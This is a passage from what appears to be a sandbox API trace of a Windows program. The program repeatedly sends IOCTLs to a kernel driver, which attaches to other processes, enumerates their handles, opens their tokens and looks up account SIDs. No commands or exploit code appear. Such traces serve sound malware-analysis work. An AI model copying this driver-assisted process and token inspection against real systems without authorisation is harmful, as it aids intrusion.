Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.557] CloseHandle (hObject=0xc4) returned 1 [0226.557] CloseHandle (hObject=0xc8) returned 1 [0226.557] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.557] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.557] PsLookupProcessByProcessId (in: ProcessId=0x884, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.557] PsAcquireProcessExitSynchronization () returned 0x0 [0226.558] KeStackAttachProcess (in: PROCESS=0xfffffa80020d1b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80020d1b30, ApcState=0xfffff880052b35d0) [0226.558] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80020d4070, HandleInformation=0x0) returned 0x0 [0226.558] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.558] PsReleaseProcessExitSynchronization () returned 0x2 [0226.558] ObfDereferenceObject (Object=0xfffffa80020d1b30) returned 0x12 [0226.558] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800315b7c4, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800315b7c4, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.558] ObfDereferenceObject (Object=0xfffffa80020d4070) returned 0x1 [0226.558] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.558] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.558] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.558] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x80, lpOverlapped=0x0) returned 1 [0226.558] PsLookupProcessByProcessId (in: ProcessId=0x884, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.558] PsAcquireProcessExitSynchronization () returned 0x0 [0226.558] KeStackAttachProcess (in: PROCESS=0xfffffa80020d1b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80020d1b30, ApcState=0xfffff880052b35d0) [0226.558] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80020dd720, HandleInformation=0x0) returned 0x0 [0226.559] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.559] PsReleaseProcessExitSynchronization () returned 0x2 [0226.559] ObfDereferenceObject (Object=0xfffffa80020d1b30) returned 0x12 [0226.559] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.559] ObfDereferenceObject (Object=0xfffffa80020dd720) returned 0x1 [0226.559] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.559] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.559] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.559] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.559] PsLookupProcessByProcessId (in: ProcessId=0x884, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.559] PsAcquireProcessExitSynchronization () returned 0x0 [0226.559] KeStackAttachProcess (in: PROCESS=0xfffffa80020d1b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80020d1b30, ApcState=0xfffff880052b35d0) [0226.559] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.559] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.559] PsReleaseProcessExitSynchronization () returned 0x2 [0226.559] ObfDereferenceObject (Object=0xfffffa80020d1b30) returned 0x12 [0226.559] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.559] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0226.559] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.559] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.559] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0xc8 [0226.559] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.559] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa80020e7060, HandleInformation=0x0) returned 0x0 [0226.559] ObOpenObjectByPointer (in: Object=0xfffffa80020e7060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800004f0) returned 0x0 [0226.560] ObfDereferenceObject (Object=0xfffffa80020e7060) returned 0x14 [0226.560] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800004f0, DesiredAccess=0x8, TokenHandle=0xfffffa800252d1c0 | out: TokenHandle=0xfffffa800252d1c0*=0xc4) returned 0x0 [0226.560] ZwClose (Handle=0xffffffff800004f0) returned 0x0 [0226.560] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.560] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.560] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.561] CloseHandle (hObject=0xc4) returned 1 [0226.562] CloseHandle (hObject=0xc8) returned 1 [0226.562] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.562] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.562] PsLookupProcessByProcessId (in: ProcessId=0x894, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.562] PsAcquireProcessExitSynchronization () returned 0x0 [0226.562] KeStackAttachProcess (in: PROCESS=0xfffffa80020e7060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80020e7060, ApcState=0xfffff880052b35d0) [0226.562] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80020e4cd0, HandleInformation=0x0) returned 0x0 [0226.562] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.562] PsReleaseProcessExitSynchronization () returned 0x2 [0226.562] ObfDereferenceObject (Object=0xfffffa80020e7060) returned 0x12 [0226.562] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.562] ObfDereferenceObject (Object=0xfffffa80020e4cd0) returned 0x1 [0226.562] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.562] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.562] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.562] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x68, lpOverlapped=0x0) returned 1 [0226.562] PsLookupProcessByProcessId (in: ProcessId=0x894, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.562] PsAcquireProcessExitSynchronization () returned 0x0 [0226.562] KeStackAttachProcess (in: PROCESS=0xfffffa80020e7060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80020e7060, ApcState=0xfffff880052b35d0) [0226.562] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80020ddca0, HandleInformation=0x0) returned 0x0 [0226.563] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.563] PsReleaseProcessExitSynchronization () returned 0x2 [0226.563] ObfDereferenceObject (Object=0xfffffa80020e7060) returned 0x12 [0226.563] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.563] ObfDereferenceObject (Object=0xfffffa80020ddca0) returned 0x1 [0226.563] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.563] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.563] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.563] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.563] PsLookupProcessByProcessId (in: ProcessId=0x894, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.563] PsAcquireProcessExitSynchronization () returned 0x0 [0226.563] KeStackAttachProcess (in: PROCESS=0xfffffa80020e7060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80020e7060, ApcState=0xfffff880052b35d0) [0226.563] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.563] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.563] PsReleaseProcessExitSynchronization () returned 0x2 [0226.563] ObfDereferenceObject (Object=0xfffffa80020e7060) returned 0x12 [0226.563] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.563] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0226.563] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.563] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.563] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8a4) returned 0xc8 [0226.563] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.563] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa80020f3530, HandleInformation=0x0) returned 0x0 [0226.563] ObOpenObjectByPointer (in: Object=0xfffffa80020f3530, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800004f0) returned 0x0 [0226.564] ObfDereferenceObject (Object=0xfffffa80020f3530) returned 0x14 [0226.564] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800004f0, DesiredAccess=0x8, TokenHandle=0xfffffa800252d1c0 | out: TokenHandle=0xfffffa800252d1c0*=0xc4) returned 0x0 [0226.564] ZwClose (Handle=0xffffffff800004f0) returned 0x0 [0226.564] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.564] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.564] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.565] CloseHandle (hObject=0xc4) returned 1 [0226.565] CloseHandle (hObject=0xc8) returned 1 [0226.565] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.565] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.566] PsLookupProcessByProcessId (in: ProcessId=0x8a4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.566] PsAcquireProcessExitSynchronization () returned 0x0 [0226.566] KeStackAttachProcess (in: PROCESS=0xfffffa80020f3530, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80020f3530, ApcState=0xfffff880052b35d0) [0226.566] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80020f3d10, HandleInformation=0x0) returned 0x0 [0226.566] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.566] PsReleaseProcessExitSynchronization () returned 0x2 [0226.566] ObfDereferenceObject (Object=0xfffffa80020f3530) returned 0x12 [0226.566] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003079044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003079044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.566] ObfDereferenceObject (Object=0xfffffa80020f3d10) returned 0x1 [0226.566] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.566] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.566] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.566] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x6c, lpOverlapped=0x0) returned 1 [0226.566] PsLookupProcessByProcessId (in: ProcessId=0x8a4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.566] PsAcquireProcessExitSynchronization () returned 0x0 [0226.566] KeStackAttachProcess (in: PROCESS=0xfffffa80020f3530, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80020f3530, ApcState=0xfffff880052b35d0) [0226.566] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80020e9810, HandleInformation=0x0) returned 0x0 [0226.566] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.566] PsReleaseProcessExitSynchronization () returned 0x2 [0226.567] ObfDereferenceObject (Object=0xfffffa80020f3530) returned 0x12 [0226.567] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.567] ObfDereferenceObject (Object=0xfffffa80020e9810) returned 0x1 [0226.567] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.567] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.567] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.567] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.567] PsLookupProcessByProcessId (in: ProcessId=0x8a4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.567] PsAcquireProcessExitSynchronization () returned 0x0 [0226.567] KeStackAttachProcess (in: PROCESS=0xfffffa80020f3530, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80020f3530, ApcState=0xfffff880052b35d0) [0226.567] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.567] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.567] PsReleaseProcessExitSynchronization () returned 0x2 [0226.567] ObfDereferenceObject (Object=0xfffffa80020f3530) returned 0x12 [0226.567] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.567] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0226.567] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.567] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.567] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8b4) returned 0xc8 [0226.567] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.567] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8001fc7b30, HandleInformation=0x0) returned 0x0 [0226.567] ObOpenObjectByPointer (in: Object=0xfffffa8001fc7b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800004f0) returned 0x0 [0226.567] ObfDereferenceObject (Object=0xfffffa8001fc7b30) returned 0x14 [0226.567] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800004f0, DesiredAccess=0x8, TokenHandle=0xfffffa800252d1c0 | out: TokenHandle=0xfffffa800252d1c0*=0xc4) returned 0x0 [0226.568] ZwClose (Handle=0xffffffff800004f0) returned 0x0 [0226.568] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.568] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.568] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.569] CloseHandle (hObject=0xc4) returned 1 [0226.569] CloseHandle (hObject=0xc8) returned 1 [0226.569] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.569] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.569] PsLookupProcessByProcessId (in: ProcessId=0x8b4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.569] PsAcquireProcessExitSynchronization () returned 0x0 [0226.569] KeStackAttachProcess (in: PROCESS=0xfffffa8001fc7b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001fc7b30, ApcState=0xfffff880052b35d0) [0226.569] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80020f2d70, HandleInformation=0x0) returned 0x0 [0226.570] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.570] PsReleaseProcessExitSynchronization () returned 0x2 [0226.570] ObfDereferenceObject (Object=0xfffffa8001fc7b30) returned 0x12 [0226.570] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003083044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003083044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.570] ObfDereferenceObject (Object=0xfffffa80020f2d70) returned 0x1 [0226.570] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.570] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.570] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.570] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x82, lpOverlapped=0x0) returned 1 [0226.570] PsLookupProcessByProcessId (in: ProcessId=0x8b4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.570] PsAcquireProcessExitSynchronization () returned 0x0 [0226.570] KeStackAttachProcess (in: PROCESS=0xfffffa8001fc7b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001fc7b30, ApcState=0xfffff880052b35d0) [0226.570] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800d49bd10, HandleInformation=0x0) returned 0x0 [0226.570] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.570] PsReleaseProcessExitSynchronization () returned 0x2 [0226.570] ObfDereferenceObject (Object=0xfffffa8001fc7b30) returned 0x12 [0226.570] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.570] ObfDereferenceObject (Object=0xfffffa800d49bd10) returned 0x1 [0226.570] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.570] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.570] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.570] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, 